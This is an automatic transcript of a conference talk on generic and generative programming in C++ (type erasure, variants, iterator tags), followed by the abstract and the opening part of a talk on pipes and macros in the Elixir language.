compatibility with non-generic code in the JVM in this case, indeed. What else do we have? Yes? Possibly simpler implementation. Possibly, yeah. I can think of kind of, they're simplifying and complicating matters for both approaches. But you know, we can, we can, especially if you have like already like a huge engine that's doing things that way. What else? There's got to be some disadvantages too, right? Otherwise everybody would do it. Yes? Type? Type? Type safety. Type safety. So since Java introduced generics, it turns out that you can write Java programs that don't have casts, but they fail with type errors at doing runtime. So you know, eventually it's a sort of a non-soundness to Java because it has these homogenous templates. And actually there was a rampus a while ago, years ago, about Java because people thought Java is type safe. And there's a ten-liner example that somebody gave a researcher and it showed that there's a program that has a type error during runtime even though there's no casts inside and there's no, there's no fault during compilation. So it's also, yes? Come again? Ah, so the generated code is going to be slower because it needs to obey the code. It needs to obey the same binary interface regardless of the types involved. And the typical example is using things like landers. For example, if you want to sort integers or sort strings or sort doubles, right, and you call sort with a homogenous lander, the binary code of sort will have to be identical for all cases. In which case, and because of that, it's going to use an indirect call for the comparison primitive because it can't, it can't change it. So it's going to have some sort of a binary, you know, in direction, an extra level of in direction for the, for that call to the comparison function. And since the cost of sort as a whole is essentially multiplied by the cost of the comparison function, it follows that sort is going to be inevitably slower than one written by hand, which would be specialized. In contrast, if you go to heterogeneous translation, which is pretty much like macros, we all know that in C++, if you sort things, you know, if you sort integers or sort doubles or sort strings, there are going to be three completely different sort functions. And each is going to essentially wire inside, in the same way we did with the macros, it's going to be wired inside the comparison that says, you know, array at position i is less than array at position b or whatever, right? How large do you think this performance gap is? I see a big, you know, this opera voice by Hubert. Well, what, I mean, how big? It could be, it could be, it could be a note of magnitude. So we're looking at some serious, some serious. And of course, people understand that and they work to fix that. And the main problem with this performance gap is that it leaves incentive for people to define their own routines. It works against modularization, because modularization, if you have a sort in the library and never care about anything, but it turns out that people who want to do high performance Java are going to end up redoing some of these things over and over again. Oh, I have, I'm on battery. So I've got to give me just a second here to, okay, system preferences. I got to do the disabled screensaver, otherwise it's going to drive everybody nuts. Never. It says, you know, it's going to shorten your life. I mean, sorry, not my life, the monitor's life. Again, please, thank you. All right. So homogenous and heterogeneous. And C-SHAB takes a third approach, which is somewhere in between, which is called refied generics, which is it's homogenous, but at the same time, they put the enough information in the generated code to restore full type information. To give you an example, let's say we have a, before that, before that. So to some extent, templates are automatically generative. But however, people don't tend to not think in terms of that, because they say, well, if I'm to make all of my code a template, then, you know, what's the gain in generative and et cetera. So I'm going to give an example that's going to use something called type erasure to realize generative starting from generics. Who knows what type erasure is? Type erasure. Okay. If you, great. So let's say we have an SQL engine, which is taken from production code, in fact. And we want to define things like, you know, the sum aggregation function. And we want to be able to define it for long and essentially all integers and sum for double and all floating point types, like, you know, float and double and then, you know, short in, long, whatever. Want to define the sum aggregator, which is, you know, some things. And the baseline approach that actually was in the Java, in the Java program, was to use an indirect call for each, adding each element and essentially have one virtual call per element added, which was prohibitively expensive. So then let's make it, let's make it faster. Each Java approach would be to define a completely separate code that looks very similar for summing doubles and summing integers. And then you kind of restore the speed. But we want to do better. We want to generate the same, from the same code, we want to generate, like, several instances of this summing, right? Write a template to generate them both. And we start simple. Apologies for the template. This is not supposed. The template is spurious. It's a copy and paste, it's again kind of thing. So we have an aggregate result, which is going to give me the result of the sum. And this is sort of my base class. It's not templated, as I said. And it gives things like, you know, map this variant to the result and finally, ultimately, get the result. Now, a word about variant. I discussed this a bit in my workshop. But let's recall what the variant is. Variant. Somebody who didn't answer yet. What is a variant? Okay. So I'm going to explain briefly what the variant is. Recall that in a database is a column, a field of a database, can't be every single, any type. It doesn't have, can't have arbitrary types, right? It can be integer. It could be a floating point number, a string. And you know, database are finicky about strings because I want to string up to this many characters. So it's a fixed length string or it's a variable length string or a blob or kind of a binary object of undetermined substance. What else can we have in a database? A date, a date and time, a time, right? What else? Boolean, I guess. What else? Blob. Yeah, blob, untyped large binary object. What else? Decimal. A decimal, BCD, whatever, yeah. Stuff like that. So a lot of stuff can live in a database, but it's part of a finite and closed universe. This is my point. So it's a part, depending on the database, it's going to be part of a closed universe of type. It can be extensible. I can kind of say, oh, let me kind of define my own stuff to put in a database. It's going to be closed universe. To represent elements of a closed universe, your best approach is to use a so-called sum type, who's been in a seminar, in the workshop. Okay, I recognize you already. So we discussed a bit sum types and essentially a sum type is also known as a variant, is a type that could hold at any point in time one of a set of a closed universe, closed set of types, right? And this works well, great with databases because they're, you know, what is the advantage of a variant over class hierarchy? Because I could define a class hierarchy that has, I'm going to derive like, I'm going to have a root called whatever, field. And the main term, integral field, double field, string field, blob field, date field, what's the advantage, what are the relative advantages and disadvantages of variant compared to a class hierarchy? Yes? You can pass it as a value. So you get rid of the whole indirection business, terrific. That's a great point. I would need to use reference semantics for that thing and actually in Java, you need to do it to do that. And there's one extra indirection in the mix for a very low level kind of thing that you need to be fast. What other trade-offs are? There's one that's subtle, which is correctness. In a class hierarchy, if you get a base class, you can, you know, it can be pretty much anything and it's sort of the universe is open. So you don't model the reality really, really well. But in a closed universe with variant, you know exactly that it only can have a finite set of possible types. So it's much easier for you to preserve correctness of your program since you know during compilation that there's no other type in the set. You can't add new types to the set. All right, so getting back to this example, we have an aggregate result that knows how to map the current row into the result. Kind of, you know, this is the worker, this is how I do work. And this is how I get the result of the work. Now here's the sort of the interesting part. I'm going to template some aggregate result that inherits aggregate result and to map things into it, I'm going to take the variant that's upon input. Oh, sorry, sorry, sorry, sorry. For everything in the database, there's one particular variant that's there, which is null, right? Database null, which is a bit different from the null pointer in programming languages, like anything can be null in a database, et cetera. This is what happens. This is why this test. So I'm taking the current row and if it doesn't have, if it's null, essentially like which is boosts terminology for the variant has no meaningful type inside of it, no meaningful value inside of it. And otherwise, I'm going to say boost get of t from the variant. And boost get of t is going to take the variant, which is a type for a boost variant type with all the appropriate types instantiated. And it's going to add that variant to the sum. And plus equal is going to do, is going to look up that the type is appropriate and is going to add to the current result, right? All right. And get is going to simply return me the, oh, sorry, it's not void, it's a variant. It's going to return me the result. Okay. So what are the pluses and minuses of the design? Well, I'm seeing a virtual call here. So for each thing I'm adding, I'm going to see a virtual call, but that's in a way inevitable because the database, you don't know statically what type the field has, for example. So this is a kind of a necessary evil we have to put up with. And advantages are, well, the sum is going to be of native type, is going to be an int or a double or whatnot. And then when I add to this, this is going to be a very cheap operation because all it does is one test and one addition. So I'm not going to call one virtual call for adding things. So that's an advantage. And here comes the type erasure part, which goes as follows. I'm not going to kind of describe what register does, but it's kind of visible from the arguments. So I have a register operator call. This is not my fault, you should know. Okay, thank you. It was there. I could have shown you and you would kind of gathered here. So in this, so when I register operators, what I'm doing is I'm planting some sort of callbacks that are going to be used later by my SQL engine that are going to be used for, in this case, summing things. So I'm registering an operator with the name of sum because that's what is called in SQL. Right? And later the database engine is going to look me up whenever it sees like sum. It's going to look up this word sum into the registry and it's going to pick up my function. And what types do I care about? I care about the type list containing short and long because these are the guys that I can support with my addition of long. I'm going to treat everything as long, right? If I were in the mood, I could have said, well, for int I want to use 32-bit addition and for short I want to use 16-bit addition. It turns out that 64-bit addition as we discussed in the efficiency talk is simply just good enough, it's fast enough, it's one cycle. So you don't care. Everything that's, that's convertible to long is good. And here we have a lambda that knows how to create an object of this kind because the engine when it, when it does things is going to look sum up in the registry, is going to create using the lambda, is going to create an object of the appropriate type and then is going to use map and get with it. So it's going to call into my functions. And second, I'm going to register a second guy which is going to define an operator with the same name but with the list, with the types of float and double that is going to work with doubles. And here I have the appropriate lambda that knows how to instantiate the sum aggregate result. And at this point I'm able to interface this generic code that we wrote for the template with code that has no idea of templates is completely interpreted and comes from the SQL engine because SQL is an interpreted language. You can, I mean you can in theory but nobody compiles SQL in the way C++ is compiled for example. And last but not least at top level I'm going to say well let me register these during program start up and I'm done. By the way this is an interesting use of the comma expression, right? I have a void function here that kind of returns nothing. And static const bool register equals register ops and true which means, you know, it does nothing except close that function and initializes vacuously register with true. So far so good. All right. What's the type list business here? I mean people who have been in the workshop know but essentially type list is a very simple way to represent collections of types as a, you know, singly linked list of types containing head and tail. It's a very old technique that nicely has gotten a revival with the event of C++11 because in C++11 we have veridic templates which make a lot of matters related to veridic, to sort of these variable length kind of structures a lot easier and nicer and simpler to deal with, right? Okay. Well, the key point here is that achieving generative code with C++ is subtle in the sense that simple generics templates do not achieve it to the maximum but you got to have the whole type erasure in the business so it can interface properly. And you generate, you generate types with generic and then you erase them with type erasure such that the code expands but at the same time it stays compact whenever you interface with code that doesn't do generics. So far so good? Yes? Sorry, could you point out a bit to clear how we are exactly the type erasure happens? Oh yeah, exactly. So where does a type erasure happen? Okay. It happens in the fact that register operator, this guy here, these guys here, they're going to deal not in terms of some aggregate result of N64T and some aggregate result of double but instead they're going to operate in terms of aggregate result which I hate my copy paste error, I hate this template. It's Freudian slip here, right? This should not be here. So they all like pass the templates, they all operate with exclusively non-template code and virtual functions. Yes? Type list? Type list? We haven't open source that yet but I mean it's really simple. There's a boost has a number of MPL facilities that represent collections of types and in that you can use MPL vector and there's also MPL list and I think there's a map as well but that's not relevant to this case but essentially it can very easily, it's a very simple piece of code whether you do it from scratch or use boosts. All right, questions about this part? All right. So you know, let's talk a bit about generic programming which is different from generative programming although we did see that in a confusing way somewhat, it kind of interleaves with it. So let's talk about generic programming and again I'm going to ask for your participation like what is generic programming because again like oh I'm doing templates, I'm doing generic programming and I'm so happy but it's not, I mean it's not as obvious as it may seem. So what is generic programming? All right, I swear I'm going to run after Jacob and I'm going to say Jacob and I'm going to say man, you know, these people don't want to answer my questions. Why don't you answer? Okay, oh here's, I'm kidding. Primarily in terms of algorithms, as opposed to in terms of the types, yeah, more, add to this. Structure based programming is generic programming. Is that? Yeah, you're factoring out commonalities of structure. You're factoring out commonalities of structure. Well here's how I define it and you know, I think this is how Stepanov defined it and you know, many, some people may disagree with the definition but actually we put it this way. Stepanov invented it. So he has a first crack at telling what it is, right? So he invented the term, he put it together so it's his prerogative to say well here's what I think it means. So it's the endeavor of finding the most abstract expression of sound computation, aka algorithm or whatever, you know, without losing its essence or efficiency. And you know, this kind of, this whole efficiency thing is a bit vague because you know, what does it stop? Like, you know, do you want to stop at assembler? Do you want to stop at? But essentially we're talking about things like we want to minimize anyone's incentive to go back and re-implement the same computation from scratch, right? Because as long as you leave a gap there, there's going to be friction against modularity and against reuse. But if you do implement, if you do implement like binary search or linear search or sorting or whatever, if you implement them to maximum efficiency within 5% or whatever, within a few percent of the best handwritten code, then you won. If you're within 30% or worse, maybe it's like, oh, everybody is going to be like, oh, I know I could use these fancy routines, but actually if I really mean business, I'm going to go ahead and implement my own. And that's the anti-reuse, right? That would be just the baseline. And a lot of very interesting languages actually fail at this kind of stuff because they do offer very nice routines, and there's actually pressure of implementing the languages primitives within the language. So harder functions and all that good stuff. And people like, I don't know, like in Lisp, a lot of people use macros because macros are going to generate, you have complete control over what macros generate. They use a macros equivalent of higher-order functions, even though the higher-order functions would be sort of the party line and the sort of the officially recommended way to do things, and they're like, those are slow. If you have like a, you know, a 15th direction, you're kind of dead in the water. And then let me use some macros to generate code, and then I'm going to run it with one in the direction, right? So this is generic programming. Boom. So we don't want to lose either the essence of the algorithm or the efficiency of the algorithm. What I mean by essence, like again, like this is a vague definition, but it's not a formalism of any kind. So what I mean by essence, the essence of the algorithm. Well, yes? I would say, I would say, I would say, it would mean to keep the syntactic layer of the same syntax. So, yeah, you want to kind of keep the syntactic shape of the algorithm in its archetypal form. Some detail about the essence would be things like, you know, in binary search, you kind of have to have random access. If you have a binary search in which you move linearly, it's not a binary search anymore. If you have a quick sort that copies data, it's not a quick sort anymore. Unlike what some people may tell you, because there's like, if you do functional quick sort, it's going to copy a lot of data. It's not quick sort by definition. It's at best a poor implementation of an algorithm that derives from quick sort, and it's going to be very slow. But, you know, my point here is, it's got to look like what the algorithm looks in the textbook, right? Because quick sort is like, you know, in place partition and recursion and those good things. And the incarnation of the algorithm must kind of have in place partition and, you know, recursion and things, right? Great. So symptoms of generic deficits, same drama, different stage. You kind of find yourself in the situation pretty much like in generative programming. You implement the same algorithm several times. True story, a friend of mine had to work with a code base in which, which was very slow. And they said, you know, optimize it. So he found five, five different implementation of sorting, all were bubble sort. Okay. So probably like the only algorithm that needs to be completely eliminated from the public, the consciousness of all programs in the world is bubble sort because it's almost rigorously worse than anything else you can try. And yet people kind of do it all the time. And of course, you replace all those seven with one code to quick sort. In that case, it was for C, but, you know, with a code to template sort, and you're done and it's faster and more years and better. By the way, you know, Q sort in C, the routine. Yes. How does it compare to sort in C++? In speed? It's slower. How much slower do you think it is? You can't, the comparison is going to be in the recall. So I've seen things like 3X. Right? I've seen things like 3X and, you know, by people who sort of in a way ought to know better because they thought C is like the efficiency and C++ is fluff. Kind of, you know, kind of all these templates and stuff. And it's actually, you know, all these indirect calls can really haunt you. So you have generic program deficit when you design with high level notions, but when you get to the implementation, you get to like greasy, you know, bolts and knots and stuff and you get your hands dirty and it looks like nothing like what you thought about. And it's like, oh, there's this nice design that we had and it's a document that's, of course, out of date by three years. But this is our design document and the implementation is like nothing like the design. You can never reuse a function without changing just a few details. So this is another issue with like, you know, a non-generic approach to programming. We have a lot of similar methods in hierarchies that you cannot reuse. All right. Anybody had the symptoms in their lifetime? Nobody. Okay. We can go home. There's a dinner cruise, whatever. There's nothing else to do. Why C++ is good at generic programming? Well, it has kind of four key things about it. One is the template engine abstracts at low cost or no cost at all. And when I say no cost, it means things that are completely vanished during inlining. So after inlining things, they become like a constant or things like that. So we've seen a lot of examples like that. Post hoc specialization is possible. So you have an algorithm that's implemented in a very generic way, but then you come later and specialize it for a specific context and case. And that's possible in C++ by means of template specialization and partial specialization. It has a great efficiency to begin with because it's from the C family and all. And it doesn't commit to one paradigm. So it lets you easily kind of shift from one approach to another when you do things. And that makes it possible for you to combine generic programming techniques with other techniques and also to, essentially, choose the best tool for the job in any situation. Of course, it also requires a lot of learning and virtuosity to get to that level, but the important thing is it does allow all of these. As a simple example, find a new item in Array and work with it and no problem at all. We know how to do that. It's a classic algorithm. The alternative would be a handwritten loop, but I want to write it that way. And well, I'm going to find from beginning to end, I'm going to find this element. And if it's not, it hasn't hit the end of the range. It means I found it, and I'm going to do work with star I. It only works with certain topologies. It doesn't work with a tree. It doesn't work with a linear structure. And well, it kind of mixes searching with work, and it's kind of difficult to improve modularily. So, let's see how doing things with find would allow us to actually make find a lot faster for certain categories of iterators. So, what ideas do you have for better linear, the better mousetrap? Well, one idea would be to make it unrolled. So, we say, well, for a specific kind of iterator, which I'm going to call random iterator, and a specific type of value, I'm going to say, well, find for this kind of iterator, beginning end, value. And I'm going to do a classic unrolling, which goes like this. I'm going to start with a prefix loop, which is going to be as long as E minus B is not divisible by 4. I'm going to simply, in a classic manner, I'm going to say, I'm going to do a linear search that way. And here, E minus B is divisible by 4. It's a multiple of 4, right? Here, at the beginning of the for loop. So then I'm going to do four steps at a time. I'm going to go, well, if B of 0 equals V return B, if B of 1 equals V return B plus 1 and so on, four times. And then I'm going to go back and repeat that again. So now the thing is, how much faster do you think this is for your typical things like integers and strings and floating point numbers? Give me a number. So you think it's 10 percent faster? 2x faster, who gives more? So actually, yes? One note of magnitude. Well, here's the thing. It can't be more than four times faster. So this is the nice thing. It has an upper bound, right? It can't be more than four times faster because what we're saving here are things like incrementing this guy and testing against the end. And we're saving like four times as much. So this is 3.8 times faster on integers and doubles, turns out. If you use binary search, it's another magnitude. Yeah, it could be any number of orders, a magnitude depending on the size searched. Yes. But the nice thing is there's two important details about this. He's catching a plane, you should know. He's not bored, okay? See you. Bye. Good to meet you. All right, so the important thing is there's two aspects to this that are relevant. Number one, it's a lot faster. And four times does matter. Making four times faster. Linear search, which is used everywhere, like everybody. Even people who should know better use linear search, they should use like a lot of places but better structures for searching. But a lot of people just use linear search because it's the easiest way and it works on unstructured data. So number one, it's a lot more efficient. And number two, you don't want to write this every time. You don't want to sit down and write this whenever you do some searching. You don't want to sit down like an idiot, write the same code like four times, right? It's something that you have this incentive to sit down and write this code over and over again. So even though fine looks not as nice as a loop maybe to you, there's people who say, oh, I have a four and if I found it, I'm going to do stuff and it's kind of all in line code and kind of, and people say, why do I have to call a function to find something in a container? Why do I need to go through all the scene directions and stuff, conceptual at least? And the answer is, in fact, when you come to this, you realize that actually it's nice to take profit of people, of what that other people have done without actually you doing anything and without you making any extra effort, you just call find and you call it a day. And the classic idiom to implement find in this particular way for random access iterators is to have this, you know, iterator tagging kind of technique, which is worth, I think this is one, the sort of the one generic programming idiom that needs to be mastered by every C++ programmer. It's the hello world of generic programming, the whole tagging business. And the way this works goes like this, well, I'm going to write find and the first thing I'm going to do, I'm going to add an extra argument to it, which is a std input iterator tag. This is a type that's defined in the standard library, but you can define your own, no problem. But essentially it's a type that kind of guides my find function a specific way. And in this case, as you notice, I'm just doing a linear find, a linear search, a straight loop with no tricks, right? And this works for any iterators, including the input iterators, which are sort of the dumbest iterators you can find, they can move forward and you can't move backward, then you can't kind of save your position and stuff like that. So these are like the least capable iterators. And find is about the only interesting thing you can do ever with them, right? Oh, we're kind of nearing them. All right, well, for binary search, sorry, for random access iterators, we're going to pass this find is going to take us to that random access iterator tag in the same position and we're going to do the tricker rule, right? And well, you don't want the user to sit down and pass you the appropriate tag. So what you need to do to wrap this up is to say, well, I'm going to define find, sort of the user visible find, the non-private find, you can think of these other two guys as private. Okay, you can think of these two guys as private, right? Sort of hidden functions. And this guy is going to take the iterator, begin and then value, and is going to pass the iterator traits iterator category. And this part is a bit of type introspection, which C++ has a little of and C++ has a little more of and C++ has a lot more of, which is pretty awesome because it allows you to introspect properties of types during compilation. And he's going to use this little bit of introspection, don't mind type name, I hate that, you need to type that to please the compiler, otherwise it thinks it's a value and stuff like that. So I plan to, what I want to do is access inside the iterator traits its category and instantiate it as an empty object and pass it to the other find overloads. And the way that works is, iterator category for any random iterator is going to be, give me random access iterator tag and for anything else is going to give me some other type, which is going to be a subtype of input iterator tag. And if I got the random iterator tag from the, from the introspection bit, so I got the, if I get a random access iterator, this is going to be a perfect match, boom. Otherwise it's going to be either, how many iterators do we have in C++? So we have random access the most powerful, then we have bidirectional, which are the so somewhat less powerful, just forward and input, right? So randomly we have a perfect match, boom, it's done. The other three are going to all convert automatically to input iterator because they inherit it. It's a subtyping thing. So everything else that's not random is going to go to this guy and is going to be picked up by this implementation and we're going to have a straight, a straight linear search for them. You'd be surprised to find out how many people actually spend time on improving this kind of stuff. Find for, if you find, if you look for things in a const char start, they're going to use memcur, right? If you're looking for characters in a, in a, in a Noref characters, they're going to use memcur because it's nothing faster in the world than memcur, right? If you look for things in, you know, again in contiguous memory that are not characters, there's again a variety of techniques that make for fast finding. If you're looking in an Noref mutable object, there's a sentinel technique. You put the item you're searching for at the very end so then you don't need to test for any boundaries. You just go like blazing speed through the whole thing and so on and so forth. And all of this is made possible by the means of generic programming to people who could care less about how the whole damn thing is implemented. They just want to use to find things in places, right? All right. And test it one, two, three. We have a vector, we have a list. And find for, the first find is going to find in vector. It's going to use the fast find and the second is going to use bidirection iterator find, which is going to fall back to the simple find implementation. All right. Ready for the evening. Thanks for being here and I'll take any questions offline because I'm sure everybody wants to go home, hotel, whatever. Thanks very much. D, your favorite color is green, okay? Go for green. Actually, you wrote two things. Oh, yeah.
Generative and generic programming are two rather different notions under similar names. To make matters more complicated, they actually do share a few interesting characteristics. This talk introduces generic and generative programming using various mechanisms offered by C++.
10.5446/50583 (DOI)
Okay, you're in the right place. This is a talk on a new language called Elixir. And mainly what I want to talk about is not necessarily just the Elixir language, but the concept of combining a couple of concepts. Elixir is a new language that's based on the Erlang virtual machine, so you have all of the management that comes with it. And some of the things that Erlang does well is especially distributed programming and concurrent programming. There's an actor model baked in. But there's also the concept of distributed programming. And when something fails, the error propagation is very good. In fact, it's probably the best system for reliability of soft real-time systems and a general-purpose functional language that's out there. So Elixir has the Erlang virtual machine. It also has a rich syntax. I don't know if any of you have ever programmed in Ruby. So many people at conferences, especially like this one, like Ruby syntax, but don't like a lot of the things that come with Ruby in terms of reliability and performance. But Elixir does base a lot of the syntax model on Ruby, which is very readable and it's easy to plug into main specific languages. But that's where the similarity ends. It's just a rich syntax. The third element that I want to talk about, though, is the concept that every programming language and every programming paradigm is going to fall short of modeling the real world. It's just the nature of things. And one of the things that a good language needs in order to stand the test of time is the ability to step outside of the programming paradigm and actually code more of a domain specific language or more of the real world directly into the model. So a good language is not just what it does well, but it also allows users to break the rules of the language syntax to do things that the language didn't foresee. So in this particular talk, we're going to talk about macros in a rich syntax with a standard syntax tree, but we're going to talk about them in the context of pipes. So the creator of the Elixir language is Jose Valin. And I was sitting with Jose and Dave Thomas who were two Elixir, big Elixir guys at a conference. And I asked Jose, why did you include the pipe concept in the language? And he basically said, I stole them from F sharp and then just kind of stared at me like that's all you need to know. So I said, okay, I'll back up and I'll try again. You know, I'm very persistent, very patient. I said, well, I'm writing a talk Jose, so give me something. And he said, so I said, do you see them as an important part of the language? And he says, it's published, it's puzzling. I haven't given much thought to it. And I thought, this isn't going to get me very far. And then Dave Thomas came to my rescue and he said something about, well, that's not what you say, what you said when I created the title of my book, which has actual pipe constructs in the subtitle. And so Jose elaborated a little bit and he said that this was an important tool for helping us think about the way that programs are composed. And most of my talks this year and last year are about moving the industry's heads from the object oriented program to the functional paradigm. And I think that when you do that, it helps to be able to talk about not just the individual constructs, which are functions, but the ways that we can think about composing them together so that we could actually build our programs that read more like stories. So as Jose elaborated a little bit, he said, it embodies one of the main ideas of functional programming, which is the transformation of data. So if I have multiple steps, I could take a concept, take data, pipe it through a concept, pipe that result through another concept and then continue into go. And I thought that that was actually a pretty good insight. Actually when, so I'm an author, I wrote a book called Seven Languages in Seven Weeks. My publisher is also an author. He wrote a lot of the Ruby books, including the pickaxe book that you see. And he and I are often looking, we often get restless at the same time. So we'll look out at the industry. We'll look at our code examples and we'll notice some deficiencies. And I don't know if any of you have written books, but a lot of it is based on fear. When you feel something that is not quite right and you want to communicate something that's not right to your reader base, you drop into research mode and you start looking at the landscape. And Dave and I were looking at the landscape at the same time. And I didn't know this, but I said, hey, I've discovered something really cool with this elixir language. It's not popular yet, but it looks like they're doing the right things and that they're about to be. And then as I was looking at the mailing list, I kept on seeing Dave's name pop up and I said, oh, he beat me again. But he was writing this book and he basically disappeared from the map for a couple of months and when he surfaced again, he'd written a book on the next language and the last one he wrote basically helped the United States and David Heinemar Hansen who wrote Ruby on Rails helped us discover the Ruby programming language. And cooked into the subtitle are these pipe characters. So the subtitle is functional, concurrent, pragmatic, fun, right? And so I asked Dave why he included the pipe character in his book and he said, well, it's an essential element of data transformation which is the new type of program composition. And I really like that answer. There's a guy named Chris McCord who created a framework called Phoenix which is supposed to be Rails like framework on Elixir. But he said pipes and macros are why I'm here. So it was nothing about the Ruby style syntax. It was everything about the virtual machine and pipes and macros and I agree with him. That's what was exciting to me. I talked to the creator of Erlang at EUC last year, the Erlang user community. It's Joe Armstrong. Anybody see us talk by the way? Of the mess we've made? Was it good? He's got some fantastic insights. But Joe said, and so he read a blog post, he wrote a blog post that was called a week with Elixir or something like that. He said, actually the Elixir version is easier than the Erlang version to read. So I do a format and then flatten it and then turn that list to a binary with the pipe operator. And he said, just like the good old Unix pipe operator. So I agree with him. So the fundamental problem that we're solving is that if you're looking at a basic functional program, if I'm coding the, I guess we have an idiom in Texas with the Texas two step, but it's one step forward and two steps back. It kind of comes from the dance. But this is what such a program would look like in a lot of functional languages. And it reverses our intention, which makes us sad. What we'd like to be able to do is take this paradigm and flip it around to make it read left to right like this. And so if you did that, you would take this program and you could show it like this. So that the first thing is a piece of data and each subsequent thing is a function and either the first or last argument, depending on whether you're working on F sharp or Haskell or Elm or some other language. And in Elixir it's the first argument. The first argument will actually be received from the construct on the left. And that's cool because that's exactly the intention that we want to express. So when you can break down programs this way, then you find that some of the programs that we've been writing all along, especially web programs, become a lot easier to think about. In Elixir we have this thing called plug, which is a framework that describes an HTTP connection. So if you can imagine an HTTP connection as something that embodies the data associated with the connection and the data that you'd like to tack on as it goes through the life cycle of a web program, then you've got something called plug. And you basically, if you basically pass that connection into a function and transform it in some way and return a plug, then you can express most web programs with a functional paradigm quite easily. Then instead of having one great massive integrated framework, you can have many smaller published plugs. That's pretty cool. Okay, so that's why we'd like to do pipes. Let's talk about some of the problems related to the pipe operator and its most generic sense and how having the ability to hack in the language using macros could change things quite a bit. Okay, so the first problem is that I might have some unreliable tasks. And if I try to pipe all of those together and they break, then I don't get a reliable return code. So let's say that I'm coding an unreliable game like Russian Roulette. So in Texas we have a six-shooter and you put one bullet in the chamber, spin it, and then hold this gun to someone else's head. We're in Texas, right? And then pull the trigger. Well, a simulation, if I run this simulation, you see the line at the bottom. So I start with an okayed return code. So I'm ready to start the game. And then I pass that through my click and my bang methods. And one of those should end the game and the rest of them should just say click, right? But I get this result. It's kind of surprising, right? Because I have a click after the bang. So we're surprised and ultimately angry and sad because our code doesn't do what we want it to. And we know what it's supposed to do. So how would you change this program? Well, you have a couple of choices. The first thing that you could do is you could potentially corrupt your functions. You could basically paste a little adapter code into the top of each function, right? It says if we hit, if you've already hit bang, then stop. Otherwise, continue. But that's not very dry. That's not very interesting. You could also code an adapter that you would wrap around all of your functions and then pass a function plus your adapter all the way through. But that's also not very dry and it complicates the whole pipe, the readability of your pipe. And you could also corrupt your compositions. So you could compose things in a different way using a different operator. That's not quite as cool as the pipe and lose a lot of the readability that you gained in the first place. But I started the talk by saying that in every language there comes a point that the language operators don't match the real world. And what you'd like to be able to do is extend the language by hacking into it more deeply than traditional language constructs would allow. What we really want to do is change what pipe means. And that's what this talk is about. Okay? How many of you have coded a macro in a functional language? So a couple of you back here, a couple of you over here. What about in an object-oriented language? Okay? So here's a couple of examples of macros. Macros are most popular in Lisp, right? Here's an example in maybe the answer, one of the siblings of or one of the children of Lisp in the language tree. This is closure. So I have a macro called in less. And I'm going to pass it a test and a function body. And if you see that apostrophe in front of the if, that's a quote operator. And then there's another corresponding operator called unquote that we'll talk about in a little bit. There's also macros that every developer's use every day in almost all languages. That looks like this. Right? When the language breaks down, we often break down, we often reach for cut and paste. Right? When you start to see a lot of similar boilerplate and you're looking for a feature in the language that won't satisfy your boilerplate, then it's time to reach for a new tool. And sometimes a macro is a good tool to reach for. So in Elixir, well, back up a step. In Lisp, the reason that macros are so interesting, there's a great representation of the code and a great representation of the data and those are the same thing. So I can basically hack on the syntax tree using the language itself. Right? And it turns out that if you look at Elixir, the same thing is true. In Lisp, you have a two element Lisp. You have basically the function and the arguments. And the high, the metadata. Elixir is essentially the same thing where you have the function and the metadata and middle things like line numbers and other contexts. And then you have the arguments. And so what we're going to do today is actually hack this syntax tree. We're going to write code that changes what those tuples are that we put into the syntax tree at compile time. But the hacking is not going to take this form at all. We're going to write code that looks more like templates. And we're going to do mail merges into those templates at compile time. Okay? So the basic problem that we're solving is this one. Who can see the bug in this program? Let me give you a hint. The Elixir language does have side effects. Any guesses? So unless some clause is true, do this expression. When does that expression get evaluated? It's always going to call the expression, right? It's always going to call the expression. So we're going to break, right? So basically this is broken because this expression is going to be evaluated at the wrong time. Let's say we said if or unless true, I mean, unless true, which is unless false. I'm already backwards, right? Okay. So unless false, we're going to call the expression, right? But when you list this, when the expression within the parentheses is computed, we're actually calling whatever is in the expression. So if there's a side effect in there, we're dead, right? So it's unless things are really bad, launch the missile, right? Or unless things are okay, launch the missile. And then we're in trouble, right? Okay. So what we'd like to do instead is a macro, right? Think of this as a mail merge that gets called a compile time, okay? So everything in quote is going to be output into the syntax tree. Remember, we're listing this code inside the quote as raw Elixir syntax. But what's really going into the syntax tree is a series of tuples, right? The whole language is based on a series of tuples. Every statement is a three tuple in the language. So in this case, what we're saying is if the clause is true, so basically we're unquoting the clause, we're causing that to be evaluated right then, right? Then we can delay the evaluation of the expression. So that's what we're doing with the quoting and unquoting, right? Quoting says dump this syntax into the syntax tree. And the unquote says go ahead and compute this clause now, right? So one of the things that you'll see throughout the course of the talk is that some of this code is actually being, we're delaying execution and some of the code we want to execute right now. And we'll talk about tools to do so as we go. Okay. So let's go back to our program. So what we'd really like to do with this game is say as long as things are okay, continue. Continue the piping process. And then once things don't match that anymore, we want to break and return the last result that's happened, right? So in this case, what we're matching is the okay symbol and the wild card, right? So as long as the return code, so often Erlang libraries use a tuple of okay and a result or error and a result to express a return code. So let's code our macro now. This is what it looks like. Or this is basically what we're supporting. We're supporting that pipe matching okay. The underscore is a wild card. The okay is return code. And just like with that and less, what we're really trying to do is to preserve the syntax so that I get that same beautiful expression of the pipes. I want to delay the execution of the elements of the pipes until it's actually time to execute them. And so we have to use a macro. The language isn't rich enough to solve this problem without the precompile step. So everybody follow me so far? Okay. So a macro is going to be some code that executes at compile time. And typically what we're going to do with that code that executes at compile time is to change the syntax tree and create a different result. So in this case, we have a module that's called pipe and the under bar, under bar using under bar macro is essentially going to be called when this module is included or used. We're going to use the use directive. When that's included, we're going to do some, we're going to include some code. In this case, we're including pipe, which means we're importing pipe, which means that I don't have to say, I don't have to use that, I don't have to say pipe dot while matching or pipe with, right? It'll fully qualify that for me. And then I'm going to define the macros that are required. Well, the first macro that we're going to look at is pipe matching. I'll let you digest this a little bit, then we'll take it apart. Let me point out some bits of syntax here. Of course, you see the do in blocks and those are exactly what you expect they are. They're blocks of code. There's an alternative representation of that code that can be expressed in one line, but typically you'll see it listed like this. You'll also see an anonymous function. Do you see the red ampersand there? That's an anonymous function. It has one argument and that's represented as ampersand one in the TLCode there, right? So that says that this macro is going to take an expression and then my pipe segments, right? And that expression is going to be evaluated and as long as that's true, as long as we match, so that's a match question mark, the expression which we're going to calculate at compile time, then go ahead and use the first pipe segment, right? Okay, so the way to take this apart is to think about when things are being executed. Recall that some of the stuff is going to be just mail merged, right? So just like a mail merge, some of the text is going to be we're going to delay execution. We're going to list it, we're going to list the code and in some places we're going to substitute in executed values. So in this case, the outer level things that get actually executed at compile time are these. And 